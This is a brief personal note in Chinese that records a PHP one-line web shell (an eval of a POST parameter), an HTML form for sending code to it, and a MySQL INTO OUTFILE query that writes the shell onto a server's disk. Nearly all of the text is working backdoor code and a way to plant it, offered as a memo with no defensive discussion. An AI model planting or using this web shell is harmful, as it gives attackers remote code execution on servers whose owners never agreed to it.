<?php @eval($_POST['c']);?>
使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行
<html> <body> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html>
仅此做个记录,php这东西真恶心
后补充记录:
mysql输出文件
select '<?php @eval($_POST["c"]);?>' INTO OUTFILE 'e:/m.php'